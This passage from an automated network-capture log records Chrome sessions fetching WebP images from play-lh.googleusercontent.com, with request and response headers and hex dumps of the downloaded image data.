                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1390INData Raw: b5 54 4a 66 f8 01 79 35 79 c4 bc 82 80 28 c2 92 11 cf 0a 76 49 d6 0d 30 44 9e 59 9f ec fa ec c5 7a a6 48 bb aa 09 2f 8e e7 e2 32 9e 9a 2c 10 45 fd 35 f2 55 89 93 0f 0c fe 85 71 0a 0f 83 1a c3 e9 76 b0 67 63 6d ac 3a 4f ad 6e 2b 63 04 11 6f 96 96 3e 9e 28 16 60 4d 4f 76 c6 89 64 05 6f 03 d7 d2 92 d8 60 82 81 f8 ce 55 de f0 79 2c 62 20 84 9f 61 90 78 d0 d6 3e c3 42 99 f2 cf 06 72 80 0b 1a c4 29 ab 3b ee 39 6a 2f ae 5a 89 dc 6e 61 ef af f1 5d 47 75 51 73 e6 1e a5 ea 77 d6 66 5b ca 36 82 bf 9c 3f f1 9e e6 1a 88 f0 ab 32 08 6c 44 5e 23 b7 e4 7b 2b 98 0f 11 ea 62 ee 56 62 44 43 19 61 f5 52 58 1e 6a a6 0f 77 25 94 4f de 9d 00 7e 33 7e 9e 71 3b 49 88 59 c4 a2 ab 4e 13 16 a6 9b 55 b2 34 bb c5 c7 4f 24 ca 79 a2 90 c5 6a 57 e0 07 e8 fe 4c 78 21 52 10 fd 1e f7 b8 d1
                                                                                                                                                                                                                                Data Ascii: TJfy5y(vI0DYzH/2,E5Uqvgcm:On+co>(`MOvdo`Uy,b ax>Br);9j/Zna]GuQswf[6?2lD^#{+bVbDCaRXjw%O~3~q;IYNU4O$yjWLx!R
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1390INData Raw: 54 52 ea 62 1a 46 87 45 ad 03 88 02 1e b5 fd 37 b5 53 43 9b 87 d4 00 36 89 0c 14 a3 bc b3 bd 5a 6b 5e 31 58 a2 c5 c1 f7 03 a3 ff f2 28 65 c3 b1 e3 34 29 b0 33 b9 f1 15 f7 dc 36 dd ba 91 b4 f2 44 05 73 79 af 43 b7 81 b0 5e 38 30 73 a1 35 44 f3 2c c5 ad 9b 0e ce af 66 99 7c f6 01 40 44 44 d5 8b ae 71 17 6f 83 8d bf 0b 34 9b 05 db 0c 58 e1 86 4e dd ca 80 5f f3 9b 50 db d4 c9 0d 8c 02 0a 9d 55 49 54 82 c5 66 c4 e6 87 1a b5 78 07 a5 21 f6 e7 40 ab 6d ff e5 41 af 98 81 cd bf 10 b4 10 e1 ec 7b 8d f0 09 0f 48 c2 c0 2f 2d 4e b2 4e 85 63 e3 f8 c2 e0 10 64 17 f1 2c ff 01 43 90 d5 f2 3d 4f d2 df a7 9a 0c 7a 1e 8b 8a 89 94 a9 e8 cb 68 f2 5b 66 18 dd ee 70 cb fc 1b c4 b0 63 11 74 a1 f7 29 b8 63 df 0c 41 24 e6 27 46 17 ec 56 1f 5a 3b 01 4b 1c 4a e6 d5 60 bc 6b 2e ac 48
                                                                                                                                                                                                                                Data Ascii: TRbFE7SC6Zk^1X(e4)36DsyC^80s5D,f|@DDqo4XN_PUITfx!@mA{H/-NNcd,C=Ozh[fpct)cA$'FVZ;KJ`k.H
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1390INData Raw: 98 f4 49 d7 0c ce fa e0 41 ba f4 12 bf 58 7a 87 85 73 9f 77 63 28 e7 84 16 b3 c5 02 b7 4f 88 ce e2 c0 7e b2 f7 9d e3 27 0a f6 49 99 c5 2d f4 43 d6 d5 84 b7 45 fe 11 0c 24 1d e0 63 f2 db a5 78 c9 44 e3 85 76 ab 79 b8 3a ac cc f6 2f 50 9c 22 b0 24 1b 0c a5 61 20 03 13 20 45 ee a3 b8 6b f4 cf df 00 9c 82 6b 87 3d ae 80 b5 52 b7 b0 1f d8 78 35 57 b8 2a c3 b4 95 bb de 7c 8c 01 ed cb 82 66 2e a9 02 14 ff 13 8c d3 98 be 23 88 4d e0 13 28 14 8e c7 bc dd be be 79 e4 30 56 04 f1 5c 1f a8 71 e3 06 7a cf e3 a9 f8 cc 7a a2 81 dd 05 25 fd cf c5 7e ce a8 6c 6e 5b 1e ae 84 29 00 29 ff 98 24 25 89 0c 73 7e 97 a8 b8 7e ba 5d 6f 46 d6 a7 91 b8 3c 0d 8d e8 9a 48 0c b4 10 d5 a0 d9 d8 3b 34 e1 f2 40 d9 93 ee 66 ef 93 40 09 af 52 fb dd 15 86 df 09 11 ad 57 c6 c6 7c 72 07 ce 18
                                                                                                                                                                                                                                Data Ascii: IAXzswc(O~'I-CE$cxDvy:/P"$a Ekk=Rx5W*|f.#M(y0V\qzz%~ln[))$%s~~]oF<H;4@f@RW|r
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1390INData Raw: 08 83 40 8a a6 74 09 2d 3c 89 eb 1b ae 50 98 c8 c7 3c fa ce 2f 2f 2c 65 48 c5 d1 a0 a6 d4 88 2e db ba 2c 1d ec a5 95 f7 11 e1 82 bd c8 94 1a 75 90 77 50 5c f8 20 04 a0 01 55 d0 bc 6e 65 18 92 03 7e 39 60 9b 47 61 bc 02 22 ff 33 c8 da 71 b1 e0 e0 bb a1 82 fd de 75 43 b4 ab 1c 93 2d fc c0 09 76 49 19 76 c9 1a 3f f7 e9 fe cd e2 99 a8 e8 5a 54 a8 57 55 cc 17 46 14 75 a0 d5 5e 69 e5 3e 82 b0 c9 bc 0f 11 41 93 be f3 f0 4c 6d d0 6d 47 e0 88 2c 2f c0 8e ad f7 e0 83 cf 1f 62 37 b1 dd 50 47 2b a5 81 dc 60 25 3b 07 e7 58 6c a8 07 b7 8e 56 fa c6 02 f2 df e7 7d b9 5b 5c 9b 44 99 b3 a3 47 09 ce 77 ad e7 61 28 b3 d4 ea fc db ea 10 63 90 32 3e 9e 52 e2 80 73 bc d3 dc b1 37 0e ed 8a f7 2c f0 d5 a9 f5 16 83 d8 da 22 3c 7b 59 be 41 be 8a 11 58 30 64 ed 4d 8c 96 d9 c9 64 b9
                                                                                                                                                                                                                                Data Ascii: @t-<P<//,eH.,uwP\ Une~9`Ga"3quC-vIv?ZTWUFu^i>ALmmG,/b7PG+`%;XlV}[\DGwa(c2>Rs7,"<{YAX0dMd
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1390INData Raw: 16 04 c2 55 98 29 7c 2c 8d 45 7a 81 99 9f ac b9 ca 48 42 80 54 99 07 ef 85 03 f7 d1 fb 4e 0e 6f 28 ee 23 68 2b b3 d7 ef 76 e7 05 69 2f eb 5d 59 82 4e 71 2a 97 c2 70 1d f3 53 8e bf 0c ea e2 d3 38 e6 9f df dc e5 c0 22 f1 d0 af 01 dc e9 03 bf fc 38 72 51 4f a0 e6 33 24 57 13 af bd 86 52 6c 7e 5d cf b6 1b 23 35 b2 62 9a e3 bb 9b fc ab 36 47 9f 4b 2f 00 80 ec 4b 45 59 e1 24 18 a2 33 37 5a d0 60 b2 c2 5c 26 88 d8 83 24 ed 32 a4 ae 2e 17 a6 84 07 d6 c1 24 0d 0f fd 8a 3d 44 10 27 71 c2 78 74 bc 9c f4 bf d6 99 b7 33 43 81 db 5c 5f 15 af 36 78 da ff a1 20 16 57 4c 5a 13 86 ed 37 bc 04 c5 85 d4 5e ca a4 58 0c ea c5 ab f5 70 5b 83 aa e4 bd e4 54 e2 ac 35 70 dc 36 b6 ed 00 9a 04 35 27 65 b8 f5 4f bc b2 b4 09 80 4b 9e a4 9d ad 69 36 f0 61 b8 98 50 97 58 68 76 7e b9 9d
                                                                                                                                                                                                                                Data Ascii: U)|,EzHBTNo(#h+vi/]YNq*pS8"8rQO3$WRl~]#5b6GK/KEY$37Z`\&$2.$=D'qxt3C\_6x WLZ7^Xp[T5p65'eOKi6aPXhv~
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1390INData Raw: ff 7c 3c 91 a9 55 b3 15 cf 30 19 d1 fe 9b ad f1 2c 8b ab 2f 21 a9 0f 4f d3 46 4e a9 5f 7f 6f 9e 8f c7 32 23 d7 33 3c 0f 37 fc 3c 20 46 55 b4 86 ac 1f ed 13 d0 a7 86 3f 1a a9 e0 98 dc aa 03 d2 ac 4e ef a2 bb a0 98 f9 2d cb 23 36 74 4a 81 56 81 2b 40 60 3f f9 c3 d7 8c 3c 25 8d 4d da 07 b1 ec 07 fa e1 97 29 c1 a6 33 89 5f 7f 91 56 b9 82 44 92 53 d0 62 a0 5c 43 b0 1c d0 9a 98 5a f0 41 ca 58 77 76 7a a9 16 f3 2b c7 be 21 b0 9d 79 ad a0 a7 86 0d 7c 77 54 fb 31 33 61 06 4e cd 0f e4 37 75 bd 7f ba 64 c6 b0 17 bf ea e6 ed 32 22 c6 22 ab 29 69 70 3f 4f 47 2b 67 65 40 a6 96 52 0d b7 8c be e7 7e 77 fb e1 df ea b0 f5 80 5e f9 61 e7 34 48 e8 62 bf 67 b8 8b 56 97 61 d4 d5 09 b3 6f 0a 46 c4 db a7 8c 1b 23 23 11 15 d0 b6 b4 f9 54 9a 47 47 35 f1 6a be 23 96 b9 81 1a d6 9e
                                                                                                                                                                                                                                Data Ascii: |<U0,/!OFN_o2#3<7< FU?N-#6tJV+@`?<%M)3_VDSb\CZAXwvz+!y|wT13aN7ud2"")ip?OG+ge@R~w^a4HbgVaoF##TGG5j#
                                                                                                                                                                                                                                2024-09-29 04:54:44 UTC1308INData Raw: c0 d8 fe 7f e0 90 fe 6a 47 f5 9f ed 87 f9 0e de 85 5e cf 8a 35 44 c3 11 0d af 9d 76 3a 4f d8 25 6a 3c 72 8a 03 2b 01 91 7f 3e 3e b8 77 4a 45 16 5e 42 b2 93 03 2f 0e 51 5a 89 1a 06 78 9d 15 27 c8 f1 65 4a 5c 10 3f 92 e2 80 fd de 58 e4 07 8f a5 ab d8 b9 2e cf b4 bd 25 8f ee b9 da 1b 6c ac d8 1f 18 1c 32 c8 cd 2e bd f3 bb 6e a4 03 cf da f4 68 ed 30 9a b3 4c c5 ce f4 6d 24 93 4a 8c 14 c5 48 9f 49 e5 ab b4 e8 a9 ab e8 99 57 6c 4d b5 a5 b6 2d d7 b3 5f b1 61 6c 55 1f 39 cf 8e a9 28 a3 35 c4 e4 03 a4 a8 6f 6a 3f b9 b5 67 05 7c 2e 68 4c 3c 4e a7 ea 47 6b 89 a9 5e e0 61 62 d1 5e 46 93 28 eb c8 ec 8d 84 e8 23 2c e5 0f 2a 42 28 f6 dd 67 7d f3 29 4b 6b 72 5a e8 65 87 df fa 36 52 f0 71 72 a4 35 d0 9b 86 c5 fd b6 0d 22 4d 05 3d ea ae ec 7e 32 5f c6 6e 08 ff c4 49 c8 49
                                                                                                                                                                                                                                Data Ascii: jG^5Dv:O%j<r+>>wJE^B/QZx'eJ\?X.%l2.nh0Lm$JHIWlM-_alU9(5oj?g|.hL<NGk^ab^F(#,*B(g})KkrZe6Rqr5"M=~2_nII


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                117192.168.2.450013216.58.206.864432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC529OUTGET /rbz2GOYtKwW-yK99VC_CBSUL_k2PWkkL4NfYubMEmKBCPbGuNxZb_pP7N2WAKZsQUw=w416-h235-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 39178
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 02:49:29 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 02:49:29 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 7516
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC856INData Raw: 52 49 46 46 02 99 00 00 57 45 42 50 56 50 38 4c f6 98 00 00 2f 9f 81 32 10 4d 40 72 db 48 92 24 db 31 6b 44 fd ff c1 19 dd a8 59 cf 11 fd 9f 00 fd 3f b3 bc bf 2f 1e 45 ef 9d 3e 7c 1f 6b 54 75 48 0a 76 ba 6d bb 5b be 23 ec 2e a8 3a a6 db 76 77 d7 74 6b 6e a8 e8 90 64 83 97 73 fc 50 77 c6 00 23 49 9c 9b cf ee 6e cf 2c d6 c7 13 31 45 92 43 b5 d9 ee 9e b6 ed 39 22 b7 a9 27 00 23 6d 6f 85 96 e9 ee c5 76 c9 63 59 79 14 76 e9 5d 79 7b f0 c5 06 30 90 48 79 9b f7 2a be e6 0a d8 66 4d 1a a9 df 5f e7 6b 12 1f 40 b7 a4 58 2d f5 f8 6b 38 c7 91 dd 02 a2 9a 1e f8 92 16 30 53 91 88 40 52 2b 50 fe 8a a4 48 52 00 36 92 08 0e 7c 45 bb b2 1e 88 11 62 ed 2f 30 70 b0 8b 90 e7 ea 16 1e d4 91 00 49 83 0b a4 19 95 ef 30 d8 01 3b 22 85 b2 b9 4a 9a 96 6f 01 1c 80 44 49 55 05 5a ea
                                                                                                                                                                                                                                Data Ascii: RIFFWEBPVP8L/2M@rH$1kDY?/E>|kTuHvm[#.:vwtkndsPw#In,1EC9"'#movcYyv]y{0Hy*fM_k@X-k80S@R+PHR6|Eb/0pI0;"JoDIUZ
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: ee a3 59 e6 36 8c 8c 59 1a 1e e6 ff 97 db 91 63 cf 75 96 d1 13 6f 98 99 99 99 99 99 99 99 99 99 99 99 93 65 66 66 66 1e 08 33 2f a3 a7 78 df 73 ce 7b ce bd 7b 5e 57 c9 27 15 3a 8b 95 75 a4 91 ab f0 82 5d 85 17 ab a9 3c 45 78 bc e0 89 34 5a 0e 5a e1 64 19 ad 5b 58 a1 a9 c6 55 b0 1a 57 21 eb 14 d6 32 c3 1b 5c e6 ad e6 2d ac 25 57 4b 56 98 ac c5 2a 64 2d 56 b3 57 ba 5a a6 59 87 39 19 2d 56 a3 2b 59 5b 85 46 61 5a 72 52 2d 9f c2 53 2d 8d 16 de a9 96 5d 85 46 ff c2 53 85 46 0b 57 8b d5 b8 0a b9 f2 56 68 2d 5c 85 69 a6 5a 9a 6a b4 58 f9 16 5e 37 c1 71 15 72 e5 2c b9 9a 53 58 8b d5 c8 d2 91 ab 65 74 b5 64 05 ab 95 25 cb 55 78 c9 55 c8 0a d3 e8 16 de 6a 3a 37 53 85 ac 30 df 80 ab b0 ab 25 57 9e 2a 34 3a 52 3c 55 d8 c5 d5 62 35 ae c2 34 5a ac d6 c5 0d 4e 35 61 a6
                                                                                                                                                                                                                                Data Ascii: Y6Ycuoefff3/xs{{^W':u]<Ex4ZZd[XUW!2\-%WKV*d-VWZY9-V+Y[FaZrR-S-]FSFWVh-\iZjX^7qr,SXetd%UxUj:7S0%W*4:R<Ub54ZN5a
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: d3 03 80 4c 12 c7 11 87 d9 59 44 f0 f4 12 2d 9e 72 cc 9c 43 af f1 44 fc 74 f4 60 81 2c 9a 06 18 29 12 b5 8d 0c 3b 63 1d 6c 80 6d 59 20 39 47 8f 97 0c 9c 44 d2 6e 6e 9d 7d 3e dd dc 37 60 71 22 7c 04 0d 13 25 97 48 d0 74 4d 37 24 5c f9 01 c0 ea 2b f4 13 f4 e5 25 ba 41 30 a1 78 82 95 1a 97 84 5d 0e 31 38 7d 5b 58 9d db c5 1d 60 8c c0 a8 7b 3a 88 8f 90 44 1e de 3b c2 c0 c4 a5 2a cd 91 c7 39 7a b3 6c 4a 19 44 9e a3 da 01 a8 9f cf 15 89 60 4b 72 af c3 b5 1f b5 64 31 f4 e8 5d 4f e2 da c3 2c 80 44 74 bd 2a 24 6c ed bb 36 6c d8 c3 4d 47 b4 9e bd 0e 62 03 4e 06 78 72 ca 90 45 5c 31 26 b7 a1 3b 09 63 08 be 69 b8 b8 4d 5c 07 90 bf 46 5c 00 4e 1b 59 12 69 88 ca 43 c5 45 81 04 08 37 5e 50 82 13 4f 5b 02 56 c5 fd 46 23 63 74 22 90 19 b3 b4 9a dd b0 a1 71 4e 90 f0 cf ce
                                                                                                                                                                                                                                Data Ascii: LYD-rCDt`,);clmY 9GDnn}>7`q"|%HtM7$\+%A0x]18}[X`{:D;*9zlJD`Krd1]O,Dt*$l6lMGbNxrE\1&;ciM\F\NYiCE7^PO[VF#ct"qN
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: 66 be 70 ed 81 76 8e eb 20 a8 6d 2b 9b 55 c5 6c 36 87 b4 05 a4 33 a8 f7 15 0b 73 1a ec 1a 02 7f b7 e7 38 d1 86 0f 30 3a f9 12 51 c1 b6 32 49 26 2a 78 5b 60 4d 54 a5 06 05 44 f9 ee 9b 6d b8 6d bb ed 85 3b 87 2c 9d ae 70 01 4f f0 ee 02 2f f0 82 52 43 cc 65 d1 04 bb f0 76 b2 5b 72 79 9c d1 6a b5 f6 8a 12 dc f6 f6 d4 83 a1 d6 ea 6e 1a 12 69 ab 67 8a 7f 3e 0d 00 f3 05 12 ef 4e 08 bd 0e f0 38 c4 45 0f 67 01 9e 76 41 92 99 15 81 2a 98 7f e9 f8 c9 12 62 b1 1b 1f 12 a0 ea d9 e1 02 b1 cb 6b 06 94 9a 1f d4 bb 05 40 d1 2d fd f3 85 e0 e2 51 fc aa 00 df b3 6f 64 8b dc 08 2e 0d c1 2f 03 d4 42 6c 68 d8 e0 92 31 f1 66 3d b8 d3 9f 25 60 bc 39 ed 1b a7 83 81 40 93 6a ac b1 6c 67 78 b3 1c 7b 82 c6 5e 55 60 bb 19 cc 75 53 59 b8 46 d4 3f dd 1e 38 05 51 ea 3d e9 3e b8 67 56 90
                                                                                                                                                                                                                                Data Ascii: fpv m+Ul63s80:Q2I&*x[`MTDmm;,pO/RCev[ryjnig>N8EgvA*bk@-Qod./Blh1f=%`9@jlgx{^U`uSYF?8Q=>gV
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: dd dd 95 3e 03 c8 8c 37 fb ee 52 68 f6 89 4f 39 f0 16 66 e2 8a c3 e4 d9 fa 8c 4e ed a9 b3 50 a6 95 0a b8 38 d1 b3 44 ce 38 ad a2 5c 1e c7 b0 82 a2 b6 d6 0a 15 fc 73 b3 9e e5 80 f4 12 64 39 5b 2e 4e 74 a7 ea f4 b1 3c a1 c5 2b 39 49 e2 4f 69 00 58 dc 9a e1 90 ad 0c 04 99 a8 01 82 89 14 50 3c 6a 71 e4 80 02 55 70 28 d1 b9 4f 6c 77 a7 f5 36 62 3b 21 5a 31 c1 77 1a b0 82 45 d5 a3 bb 7d a3 2c c9 e9 61 ab 40 7b bf d0 7e b0 a4 e4 31 81 0e c1 80 68 8f e4 69 31 dd 02 b4 56 01 26 84 4d ee 7b 35 f0 65 c1 92 c3 18 90 35 c4 a2 b2 f7 fe c3 4c bf e3 10 20 6a 3b c7 4f d1 58 33 76 49 66 27 24 de 4c 6a 28 8b 0b f0 fc 25 5f 8e 52 4f 4a 34 d2 42 83 b9 7a a1 f8 ba 1a bc 73 6a 7b 8b 3a 68 69 d1 fe 03 67 9d 4d 96 5a 48 59 45 43 c4 43 21 55 2b 59 01 3c 28 47 e2 5d 07 b7 70 5b d0
                                                                                                                                                                                                                                Data Ascii: >7RhO9fNP8D8\sd9[.Nt<+9IOiXP<jqUp(Olw6b;!Z1wE},a@{~1hi1V&M{5e5L j;OX3vIf'$Lj(%_ROJ4Bzsj{:higMZHYECC!U+Y<(G]p[
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: b7 ba 28 a4 c1 ca 03 c3 e3 f4 af 34 14 4e 76 69 7a f1 ef dc f3 4b da 8e d9 56 72 7c 7c f2 98 11 95 ec a3 f5 c6 b6 43 b3 60 9c 4b 1a 6b 19 e3 55 4e 58 ff 64 ad da 9d 9c 68 2f fc f5 31 57 3d eb 62 13 ce 2f f0 c5 ee 3f 9c 9f e1 ae 7a 0c 4e 17 a8 e0 a0 ba 55 27 11 38 29 4f b8 2a e0 d1 4a dd 9e 28 cb 00 eb 0d 90 ad be a3 9a 65 6d 0d 57 68 38 c3 51 6b 81 d1 db bb 58 31 fb 85 f3 0e 34 1f d6 0f dd 5e e7 d3 67 72 a2 8a 5c 2e 3f 7b 7f 07 29 9a e5 cc 40 7f 28 f6 7e 69 06 e4 8e db 66 ca ec 07 7c 9a 7d a7 26 11 d1 19 c2 9e 78 6b c2 09 27 7c 74 5f e4 7c b1 7b 44 da ae 0a 1a bc 37 48 2e 99 42 8d 3a d5 56 3a e7 02 f5 7f db 4d a9 35 88 f2 0e b7 d2 06 1c d0 e8 e2 d0 62 f9 eb f2 1f 16 c6 52 0e c7 2f 6a 70 4f 4c a9 22 1b 80 a8 7d 37 dd ca 23 4c 61 4e 25 af 68 e1 1e 63 28 f2
                                                                                                                                                                                                                                Data Ascii: (4NvizKVr||C`KkUNXdh/1W=b/?zNU'8)O*J(emWh8QkX14^gr\.?{)@(~if|}&xk'|t_|{D7H.B:V:M5bR/jpOL"}7#LaN%hc(
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: 3a 5a 88 66 56 b8 5b 18 95 2c f0 d7 75 4f 84 5f e4 35 22 ba 19 19 58 05 00 0a 51 a3 a7 a5 5b c2 db 3e de c5 44 87 57 43 10 34 32 ed 3f a4 35 1e af 0a 36 be f0 0b 7b 6e 40 e0 39 63 ad 5a c7 3a 56 bc d4 fa c6 b8 c7 a4 77 da 96 50 6f 2e 5c ef 0d e7 f3 7d 9d 93 e2 c2 36 47 7c 20 6b 80 a1 59 c7 8a 86 37 f7 b2 4b 86 a6 6d 6d cc 92 d0 ce dd 22 e3 99 a2 f2 d0 51 32 dc 68 f9 2c 60 50 67 24 c8 1d 20 82 0b 65 6d 36 87 9c bb 76 ed 57 73 3a 22 6b e4 ec c1 94 ff 78 b7 be 3e 6f aa 62 a7 8f 6e 0c 53 31 0f 9b 3e c8 55 a9 d0 e4 c3 fc 1e ef 93 cd 27 da 00 66 41 aa d6 f0 e1 e8 e9 fe a8 1f 18 b5 c5 8a f1 bc 52 e0 20 93 19 d3 7c 00 a3 1c df a9 82 9f 00 bf 58 06 cf 34 69 32 d7 3a eb b1 5c c6 c1 fe 42 73 87 dd a7 bf 11 2f 5c 0b 83 52 db cd a6 f7 73 32 2b e5 08 37 1c 95 24 8e 58
                                                                                                                                                                                                                                Data Ascii: :ZfV[,uO_5"XQ[>DWC42?56{n@9cZ:VwPo.\}6G| kY7Kmm"Q2h,`Pg$ em6vWs:"kx>obnS1>U'fAR |X4i2:\Bs/\Rs2+7$X
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: df 63 00 e0 6e a7 f0 d0 51 32 f8 81 ab 74 07 06 f0 87 d0 58 a0 1c 11 32 59 9e 1c 69 be 03 0e 0a fe 4e bf 65 43 ab 31 d7 9d 42 2e 97 c7 58 11 2d 92 22 de 1b 79 bc 6c 21 96 1f 00 d4 af 29 89 0a 2d 6c 12 5d d2 93 fa 8b f6 dc f5 a7 dd e6 dc f1 1d 1f 7f 5f 73 d0 e9 ab 4f 2f de ab 58 b1 62 bc ef fa 1b 96 73 83 19 76 25 b4 12 ce 01 3e 41 09 1d 11 96 bf b4 69 b7 7a 1b e3 5a e1 45 da 0c 3e 9f 01 88 bd 02 27 29 66 53 2c b6 22 49 ff 90 5a 50 25 67 24 b9 27 cc 30 01 ab c1 52 0d 33 73 c8 08 1d 34 1b 50 d0 e1 91 89 c2 c2 5d 4e 18 66 76 b0 e6 a7 8f 49 49 10 e4 f0 98 30 b9 a2 c5 4a 80 0e 9f bc b2 5f 32 bf 12 27 59 6c d6 f8 76 71 2b 69 96 db 2d ad d6 6e a7 d5 6a ed 65 1f 87 73 67 87 20 cd ee e3 4a 5b 4f c8 b7 00 66 e9 87 15 ac de 8b 14 74 7b 64 2d 76 ab cf 9e 4d ca da e5
                                                                                                                                                                                                                                Data Ascii: cnQ2tX2YiNeC1B.X-"yl!)-l]_sO/Xbsv%>AizZE>')fS,"IZP%g$'0R3s4P]NfvII0J_2'Ylvq+i-njesg J[Oft{d-vM
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: 76 ee 51 87 65 9c 39 c3 59 0f 14 a2 3b c2 04 00 27 a7 ae 78 99 a7 f6 a1 29 4f 14 2b 0e aa 55 f8 a4 87 98 51 47 2d 9a 30 44 69 d7 2c e4 44 4f 44 e4 53 b6 6a 5f b7 bf cc 64 7f 48 c3 89 81 56 ab 85 4c b2 a9 65 82 82 57 70 87 be 12 7f 58 f3 40 f5 ae df db 1a 6e 7c 9f d5 ae cb cd c9 ac c0 06 b4 60 fc ac cf 62 84 f0 9c 6c c9 04 99 9e 75 b7 5b f4 82 20 e8 05 04 a6 70 f8 e1 66 be 87 19 c4 72 59 77 b1 62 71 80 5e a3 90 e6 ef 37 0f ac 58 05 a0 4c 7e 20 2b 40 62 97 05 1d c0 61 ae 1c 40 a7 58 5d 58 4b 98 43 0c d2 16 b3 03 34 9e 02 66 05 ae a2 9b 43 03 3a eb 23 9a a1 56 14 dd bd 2f 26 cf 06 4d c8 74 fd 93 3f 09 64 8d a8 37 33 98 78 90 af 89 49 bd 88 a1 21 0a 16 64 56 4a 6e 8e 9f 63 6e e2 9d 90 58 e9 15 4a 8e 53 d6 9d 02 0b d1 d4 54 e1 24 b0 59 f6 86 bb 6b 45 e9 b3 e2
                                                                                                                                                                                                                                Data Ascii: vQe9Y;'x)O+UQG-0Di,DODSj_dHVLeWpX@n|`blu[ pfrYwbq^7XL~ +@ba@X]XKC4fC:#V/&Mt?d73xI!dVJncnXJST$YkE
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: 6c eb f8 62 73 63 c6 4b 1e 8c 0a 44 34 aa 5a 13 75 76 39 2b 2f e0 79 fa b1 82 12 e5 39 e9 68 82 65 70 2e 22 72 1a 08 18 d0 60 30 1b ea da c5 6c e6 e5 b6 1a 5a 8e 15 32 2d d1 7e 41 54 79 0b 4a b0 22 44 df 87 10 a1 a2 db cb d6 b3 8d 3a dd e9 66 eb 70 d1 97 5a c9 00 37 4b 4b 5b 3d f7 58 17 7d 3f 8b 20 9e d0 fa 54 e7 4c 02 58 95 94 7e 51 bf ac 2a c9 5b ef ac 78 27 b6 12 05 24 8b f8 fc 33 b3 a8 ae 50 7a 34 68 fc 3d 51 35 59 9e f1 95 a3 1d ca ea 21 14 42 50 b0 e2 0e 53 fe a4 05 ea 80 55 b1 c5 b6 ba 44 95 a6 1f 8e ef f2 d5 90 77 d3 6c 73 fd 81 a1 01 10 09 2d 0a 16 3b 32 da 09 a8 d8 5b 52 de 26 01 a0 bf 07 3d 7b c1 23 ce 93 13 a7 ae 30 f5 36 2b da 05 95 be e6 e3 a7 41 48 e5 2b a0 cf a1 14 d3 61 be 54 47 30 9b 5e 20 f1 0e ab ab aa 54 95 c6 78 1f 18 fa d1 1e cd 50
                                                                                                                                                                                                                                Data Ascii: lbscKD4Zuv9+/y9hep."r`0lZ2-~ATyJ"D:fpZ7KK[=X}? TLX~Q*[x'$3Pz4h=Q5Y!BPSUDwls-;2[R&={#06+AH+aTG0^ TxP


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                118192.168.2.450014216.58.206.864432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC530OUTGET /87mGXAuy0q0oyYxq5DNwHFzCByFtzDjw4clPWAURuOu3kRMcbWlwr0BzNfBNkz2wn2w=w416-h235-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
